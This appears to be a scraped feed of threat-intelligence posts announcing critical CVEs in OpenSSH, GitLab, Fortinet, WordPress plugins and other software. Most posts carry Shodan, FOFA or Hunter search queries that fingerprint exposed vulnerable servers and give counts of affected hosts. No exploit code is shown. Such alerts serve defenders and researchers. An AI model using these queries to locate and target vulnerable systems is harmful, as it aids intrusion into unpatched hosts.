🚨Alert🚨 CVE-2023-35885 #CloudPanel Zero-Day vulnerability 🧷 👇🏻 Other Dorks 👇🏻 FOFA icon_hash="151132309" Shodan http.favicon.hash:151132309 🧐 Check out a deep dive(☕️POC) on this 📌 #Infosys #infosec #informationsecurity
1
38
99
@HunterMapping
Hunter
29 days
🚨Alert🚨CVE-2024-39884: Source Code Disclosure with Handlers Configured via AddType in Apache HTTP Server 2.4.60 📊9.5K+ Services are found on 🔗Hunter Link: 👇Search Query Hunter: header="Apache/2.4.60" SHODAN: Server:
1
29
101
@HunterMapping
Hunter
1 month
🔥PoC Released on CVE-2024-6387: A signal handler race condition in OpenSSH's server (sshd) 🔗Learn more here:
@HunterMapping
Hunter
1 month
🚨Alert🚨CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server 🔗Hunter Link: 💼Scan Tool @xaitax : ⚠The vulnerability, which is a signal handler race condition in OpenSSH’s server (sshd), allows
0
79
263
2
27
99
@HunterMapping
Hunter
1 year
🚨Alert🚨 CVE-2023-33308 🐸Yet Another #Fortinet Patches Critical #RCE Vulnerability 9.8 🔥 📎 Other Dorks: Shodan: http.html_hash:1903206157 FOFA: body="app-id=1157004084" Refer to #infosec #BugBounty
0
44
97
@HunterMapping
Hunter
6 months
🚨Alert🚨TeamViewer Exploited to Obtain Remote Access, Deploy Ransomware ⚠Researchers claim attackers exploit vulnerabilities in TeamViewer to gain initial access to victim devices and then deploy the aggressive LockBit ransomware, which encrypts critical files and demands
0
44
96
@HunterMapping
Hunter
1 year
🕹️ CVE-2023-2825: GitLab CE/EE Path Traversal Vulnerability 🔥 HUNTER Search Dork(Gitlab CE 16.0.0) : Dorks on other platforms: Shodan/FOFA: application-77ee44de16d2f31b4ddfd214b60b6327fe48b92df7054b1fb928fd6d4439fc7e.css Refer:
0
40
93
@HunterMapping
Hunter
3 months
🔥PoC for CVE-2024-27956(CVSS 9.9 🔥), Published by @MrTuxracer 📊6K+ Services are found on 🔗Hunter Link:
@MrTuxracer
Julien | MrTuxracer 🇪🇺
3 months
Today, I took a few minutes to analyze the #WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) #security #vulnerability . Turns out it is super easy to exploit. Here is a basic PoC: Since "q" is passed directly into a $wpdb->get_results() call,
11
146
596
6
36
95
@HunterMapping
Hunter
23 days
🚨Alert🚨CVE-2024-6385(CVSS:9.6):GitLab Patches Critical Flaw Allowing Unauthorized Pipeline Jobs ⚖It's worth noting that the company patched a similar bug late last month (CVE-2024-5655) that could also be weaponized to run pipelines as other users. 📊2.4M+ Services are found
0
33
96
@HunterMapping
Hunter
10 months
🚨Alert🚨 CVE-2023-5002 #pgAdmin remote code execution vulnerability 🧷 Dorks 👇👇👇 FOFA icon_hash="2068826621" Shodan http.favicon.hash:2068826621 📰 Refer to #infosec #infosecurity #Infosys
9
26
92
@HunterMapping
Hunter
3 months
🚨Alert🚨Path Traversal Affecting Multiple CData Products!!!!CVE-2024-31848/31849/31850/31851 🔥PoC: ⚠The issue exists because of a combination of how the embedded Jetty server and CData servlets handle requests. 📊2.5K+ Services are found on
1
30
93
@HunterMapping
Hunter
3 months
🚨Alert🚨CVE-2024-28890: Critical Forminator plugin flaw in WordPress sites! ⚠It may allow a remote attacker to upload malware on sites using the plugin. 📰Refer: 📊 149K+ Services are found on the 🔗Hunter Link:
1
31
91
@HunterMapping
Hunter
5 months
🚨Alert🚨CVE-2024-23112: An authorization bypass through user-controlled key vulnerability [CWE-639] in FortiOS and FortiProxy ⚠ It may allow an authenticated malicious user to gain access to another user’s bookmark via URL manipulation. 📊 3M+ Services are found on
0
38
93